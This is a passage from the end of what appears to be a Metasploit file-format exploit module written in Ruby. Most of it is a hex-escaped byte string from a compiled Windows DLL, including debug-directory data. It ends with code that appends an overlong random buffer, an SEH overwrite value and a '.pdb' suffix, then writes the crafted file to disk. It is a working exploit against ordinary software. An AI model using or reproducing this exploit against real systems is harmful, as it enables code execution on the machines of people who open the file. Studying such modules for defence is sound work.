00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x68\x65\x20\x76\x61\x6C\x75\x65\x20\x6F\x66\x20\x45\x53\x50\x20\x77\x61\x73\x20\x6E\x6F\x74\x20\x70\x72\x6F\x70\x65\x72\x6C\x79\x20\x73\x61\x76\x65\x64\x20\x61\x63\x72\x6F\x73\x73\x20\x61\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x63\x61\x6C\x6C\x2E\x20\x20\x54\x68\x69\x73\x20\x69\x73\x20\x75\x73\x75\x61\x6C\x6C\x79\x20\x61\x20\x72\x65\x73\x75\x6C\x74\x20\x6F\x66\x20\x63\x61\x6C\x6C\x69\x6E\x67\x20\x61\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x64\x65\x63\x6C\x61\x72\x65\x64\x20\x77\x69\x74\x68\x20\x6F\x6E\x65\x20\x63\x61\x6C\x6C\x69\x6E\x67\x20\x63\x6F\x6E\x76\x65\x6E\x74\x69\x6F\x6E\x20\x77\x69\x74\x68\x20\x61\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x70\x6F\x69\x6E\x74\x65\x72\x20\x64\x65\x63\x6C\x61\x72\x65\x64\x20\x77\x69\x74\x68\x20\x61\x20\x64\x69\x66\x66\x65\x72\x65\x6E\x74\x20\x63\x61\x6C\x6C\x69\x6E\x67\x20\x63\x6F\x6E\x76\x65\x6E\x74\x69\x6F\x6E\x2E\x0A\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x88\x58\x01\x10\x30\x57\x01\x10\x0C\x57\x01\x10\xCC\x56\x01\x10\x98\x56\x01\x10\x74\x56\x01\x10\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x53\x74\x61\x63\x6B\x20\x61\x72\x6F\x75\x6E\x64\x20\x74\x68\x65\x20\x76\x61\x72\x69\x61\x62\x6C\x65\x20\x27\x00\x27\x20\x77\x61\x73\x20\x63\x6F\x72\x72\x75\x70\x74\x65\x64\x2E\x00\x00\x00\x00\x54\x68\x65\x20\x76\x61\x72\x69\x61\x62\x6C\x65\x20\x27\x00\x00\x27\x20\x69\x73\x20\x62\x65\x69\x6E\x67\x20\x75\x73\x65\x64\x20\x77\x69\x74\x68\x6F\x75\x74\x20\x62\x65\x69\x6E\x67\x20\x69\x6E\x69\x74\x69\x61\x6C\x69\x7A\x65\x64\x2E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x75\x6E\x2D\x54\x69\x6D\x65\x20\x43\x68\x65\x63\x6B\x20\x46\x61\x69\x6C\x75\x72\x65\x20\x23\x25\x64\x20\x2D\x20\x25\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x6E\x6B\x6E\x6F\x77\x6E\x20\x4D\x6F\x64\x75\x6C\x65\x20\x4E\x61\x6D\x65\x00\x00\x00\x00\x00\x55\x6E\x6B\x6E\x6F\x77\x6E\x20\x46\x69\x6C\x65\x6E\x61\x6D\x65\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x75\x00\x6E\x00\x2D\x00\x54\x00\x69\x00\x6D\x00\x65\x00\x20\x00\x43\x00\x68\x00\x65\x00\x63\x00\x6B\x00\x20\x00\x46\x00\x61\x00\x69\x00\x6C\x00\x75\x00\x72\x00\x65\x00\x20\x00\x23\x00\x25\x00\x64\x00\x20\x00\x2D\x00\x20\x00\x25\x00\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x75\x00\x6E\x00\x74\x00\x69\x00\x6D\x00\x65\x00\x20\x00\x43\x00\x68\x00\x65\x00\x63\x00\x6B\x00\x20\x00\x45\x00\x72\x00\x72\x00\x6F\x00\x72\x00\x2E\x00\x0A\x00\x0D\x00\x20\x00\x55\x00\x6E\x00\x61\x00\x62\x00\x6C\x00\x65\x00\x20\x00\x74\x00\x6F\x00\x20\x00\x64\x00\x69\x00\x73\x00\x70\x00\x6C\x00\x61\x00\x79\x00\x20\x00\x52\x00\x54\x00\x43\x00\x20\x00\x4D\x00\x65\x00\x73\x00\x73\x00\x61\x00\x67\x00\x65\x00\x2E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x53\x74\x61\x63\x6B\x20\x63\x6F\x72\x72\x75\x70\x74\x65\x64\x20\x6E\x65\x61\x72\x20\x75\x6E\x6B\x6E\x6F\x77\x6E\x20\x76\x61\x72\x69\x61\x62\x6C\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x53\x74\x61\x63\x6B\x20\x61\x72\x65\x61\x20\x61\x72\x6F\x75\x6E\x64\x20\x5F\x61\x6C\x6C\x6F\x63\x61\x20\x6D\x65\x6D\x6F\x72\x79\x20\x72\x65\x73\x65\x72\x76\x65\x64\x20\x62\x79\x20\x74\x68\x69\x73\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x69\x73\x20\x63\x6F\x72\x72\x75\x70\x74\x65\x64\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x25\x73\x25\x73\x25\x73\x25\x73\x00\x00\x00\x00\x3E\x20\x00\x00\x0A\x00\x00\x00\x25\x73\x25\x73\x25\x70\x25\x73\x25\x6C\x64\x25\x73\x25\x64\x25\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x53\x74\x61\x63\x6B\x20\x61\x72\x65\x61\x20\x61\x72\x6F\x75\x6E\x64\x20\x5F\x61\x6C\x6C\x6F\x63\x61\x20\x6D\x65\x6D\x6F\x72\x79\x20\x72\x65\x73\x65\x72\x76\x65\x64\x20\x62\x79\x20\x74\x68\x69\x73\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x69\x73\x20\x63\x6F\x72\x72\x75\x70\x74\x65\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0A\x41\x64\x64\x72\x65\x73\x73\x3A\x20\x30\x78\x00\x00\x00\x00\x0A\x53\x69\x7A\x65\x3A\x20\x00\x00\x00\x00\x00\x0A\x41\x6C\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x20\x6E\x75\x6D\x62\x65\x72\x20\x77\x69\x74\x68\x69\x6E\x20\x74\x68\x69\x73\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x3A\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0A\x44\x61\x74\x61\x3A\x20\x3C\x00\x00\x00\x00\x77\x73\x70\x72\x69\x6E\x74\x66\x41\x00\x00\x00\x75\x73\x65\x72\x33\x32\x2E\x64\x6C\x6C\x00\x00\x00\x00\x00\x00\x25\x2E\x32\x58\x20\x00\x00\x00\x41\x20\x76\x61\x72\x69\x61\x62\x6C\x65\x20\x69\x73\x20\x62\x65\x69\x6E\x67\x20\x75\x73\x65\x64\x20\x77\x69\x74\x68\x6F\x75\x74\x20\x62\x65\x69\x6E\x67\x20\x69\x6E\x69\x74\x69\x61\x6C\x69\x7A\x65\x64\x2E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x53\x50\x44\x42\x38\x30\x2E\x44\x4C\x4C\x00\x00\x00\x00\x00\x72\x00\x00\x00\x50\x44\x42\x4F\x70\x65\x6E\x56\x61\x6C\x69\x64\x61\x74\x65\x35\x00\x00\x00\x00\x45\x6E\x76\x69\x72\x6F\x6E\x6D\x65\x6E\x74\x44\x69\x72\x65\x63\x74\x6F\x72\x79\x00\x00\x00\x00\x00\x00\x00\x00\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x56\x69\x73\x75\x61\x6C\x53\x74\x75\x64\x69\x6F\x5C\x39\x2E\x30\x5C\x53\x65\x74\x75\x70\x5C\x56\x53\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x65\x67\x43\x6C\x6F\x73\x65\x4B\x65\x79\x00\x00\x00\x00\x00\x52\x65\x67\x51\x75\x65\x72\x79\x56\x61\x6C\x75\x65\x45\x78\x41\x00\x00\x00\x00\x52\x65\x67\x4F\x70\x65\x6E\x4B\x65\x79\x45\x78\x41\x00\x00\x00\x41\x44\x56\x41\x50\x49\x33\x32\x2E\x44\x4C\x4C\x00\x00\x00\x00\x70\x71\x01\x10\xC8\x71\x01\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x53\x44\x53\xB3\x42\x22\xB6\x48\xB2\x52\x41\xBB\xA4\x80\xE8\xB2\xC8\x3D\x2D\x02\x00\x00\x00"
		sploit << rand_text_alphanumeric(1098) + seh
		sploit << ".pdb"

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(sploit)

	end

end
